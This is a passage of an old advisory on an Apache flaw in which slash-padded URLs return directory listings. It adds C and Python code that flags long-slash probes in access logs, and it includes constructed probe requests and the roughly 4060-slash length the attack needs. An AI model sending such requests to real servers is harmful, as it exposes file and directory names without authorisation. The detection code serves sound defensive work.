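	int flagged = 0;
	for (i = 0; i < sizeof benign_lines / sizeof benign_lines[0]; i++)
		if (suspicious_slash_run(benign_lines[i], threshold) > 0)
			flagged++;
	if (probe_line_slash_run(4060, threshold) > 0)
		flagged++;
	return flagged;
}

int main(void)
{
	int threshold = 16;	/* well above the double slashes of sloppy URL joins */
	size_t i;
	for (i = 0; i < sizeof benign_lines / sizeof benign_lines[0]; i++)
		printf("run %4d  %s\n", suspicious_slash_run(benign_lines[i], threshold), benign_lines[i]);
	printf("run %4d  <constructed probe line of 4060 slashes>\n", probe_line_slash_run(4060, threshold));
	printf("%d of %zu lines flagged at threshold %d\n", count_flagged_sample_lines(threshold),
	       sizeof benign_lines / sizeof benign_lines[0] + 1, threshold);
	return 0;
}
```

Ordinary traffic contains double or triple slashes from careless URL joining, so set the threshold well above that; the exploit needs thousands of slashes (around 4060 on the Debian system cited in the exploit header), and the range scans the tools above perform produce a burst of such lines from one client, which is the signature to alert on.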

- Timeline

2001-03-12 Unknown
2001-06-13 Unknown

- Solution

Upgrade to Apache version 1.3.19 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Note that, per the conditions stated in the exploit headers above, the listing is only produced for directories that have both the Indexes and MultiViews options enabled, so directories without those options are not exposed by this flaw.

- References

- Vulnerability Author

- Vulnerability Information

Apache Artificially Long Slash Path Directory Listing Vulnerability
Class: Input Validation Error   BID: 2503
Remote: Yes   Local: No
2001-03-13 12:00:00 2009-07-11 06:06:00
This vulnerability was announced to Bugtraq by Dan Harkless <dan-bugtraq@dilvish.speed.net> on March 12, 2001, and was originally announced by Martin Kraemer <martin@apache.org> on March 12, 2001.

- Affected Program Versions

Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.17
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.14
+ EnGarde Secure Linux 1.0.1
- MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
Apache Software Foundation Apache 1.3.12
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ OpenBSD OpenBSD 2.8
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0
+ Sun Cobalt ManageRaQ v2 3599BD
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Apache Software Foundation Apache 1.3.9
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ Sun Solaris 8_x86
+ Sun Solaris 8_sparc
+ Sun SunOS 5.8 _x86
+ Sun SunOS 5.8
Apache Software Foundation Apache 1.3.4
+ BSDI BSD/OS 4.0
Apache Software Foundation Apache 1.3.3
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha

- Unaffected program versions

Apache Software Foundation Apache 1.3.22
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0

- Vulnerability discussion

Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a widely used package, shipped with many UNIX-derived operating systems and also usable on Microsoft Windows.

A flaw in the package allows directory indexing and path discovery. In the default configuration Apache enables mod_dir, mod_autoindex and mod_negotiation. A request whose path is padded with an artificially large number of slash ("/") characters causes these modules to mishandle the path: instead of serving the MultiViews-selected index.html (or the normal error page), the server falls through to an automatic listing of the directory's contents.

The listing gives a remote, unauthenticated attacker file and directory names that support further information-gathering and may assist a later compromise of the system. All Apache releases prior to 1.3.19 are affected; the fix is to upgrade to 1.3.19 or later.
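
The request pattern described above is easy to spot in server logs. The following is an added example, not code from the advisory or from the Apache project: it parses Apache Common Log Format lines, flags request paths containing a long run of consecutive slashes, and includes a heuristic that classifies a response body as a mod_autoindex listing. The log lines are constructed for the example, and the slash-run threshold of 20 is an assumption (no legitimate URL needs such a run, so the exact value is not critical).

```python
"""
Detect long-slash probes for the Apache directory-listing bug in access logs.

Added example, not part of the original advisory or of Apache itself.
Assumptions (hypothetical): logs are in Common Log Format, and a run of
SLASH_RUN_THRESHOLD or more consecutive slashes in a request path is abnormal.
"""
import re
from typing import List, Optional, Tuple

# Common Log Format: host ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

SLASH_RUN_THRESHOLD = 20  # assumption: any run this long is a probe, not traffic

# Constructed sample log (not real traffic): one normal hit, one long-slash
# probe that was answered 200 (what an unpatched server would do), one probe
# that was refused, and one ordinary double-slash path that must not alert.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2001:10:01:12 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '203.0.113.7 - - [12/Mar/2001:10:01:15 +0000] "GET /cgi-bin/' + '/' * 40 + ' HTTP/1.0" 200 2817',
    '198.51.100.9 - - [12/Mar/2001:10:02:01 +0000] "GET /docs/manual/' + '/' * 25 + ' HTTP/1.0" 403 -',
    '198.51.100.9 - - [12/Mar/2001:10:02:05 +0000] "GET /images//logo.gif HTTP/1.0" 200 512',
]


def parse_clf(line: str) -> Optional[dict]:
    """Parse one CLF line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec


def longest_slash_run(path: str) -> int:
    """Length of the longest run of consecutive '/' characters in the path."""
    return max((len(run) for run in re.findall(r'/+', path)), default=0)


def is_long_slash_probe(path: str) -> bool:
    return longest_slash_run(path) >= SLASH_RUN_THRESHOLD


def scan_access_log(lines) -> List[Tuple[str, str, int, bool]]:
    """Return (host, path, status, served) for every long-slash request.

    served is True when the server answered 200: on an unpatched server that
    means the probe most likely returned a directory listing and the host
    deserves a closer look. A 403/404 means the request was refused.
    """
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not is_long_slash_probe(rec['path']):
            continue
        hits.append((rec['host'], rec['path'], rec['status'], rec['status'] == 200))
    return hits


# mod_autoindex listings carry an "Index of <dir>" title and a "Parent
# Directory" link; either marker is enough to classify a captured body.
AUTOINDEX_MARKERS = (
    re.compile(r'<title>\s*Index of ', re.I),
    re.compile(r'Parent Directory', re.I),
)


def looks_like_autoindex(body: str) -> bool:
    """Heuristic check of a response body for an automatic directory index."""
    return any(p.search(body) for p in AUTOINDEX_MARKERS)


if __name__ == '__main__':
    for host, path, status, served in scan_access_log(SAMPLE_LOG):
        flag = 'LISTING LIKELY' if served else 'refused'
        print(f'{host} {status} run={longest_slash_run(path)} {flag}')
```

Run against the constructed sample it reports the two probes and stays quiet on the double-slash image path; on real logs feed it `open('access_log')`. Pair the log check with a response check: if a 200 answer to such a path also satisfies looks_like_autoindex, the server is still exposed and should be upgraded.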

- Exploit

The following exploits were released:

- Solution

Upgrade to Apache 1.3.19 or later. Upgrades were issued for the following affected releases:

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.9

- Related references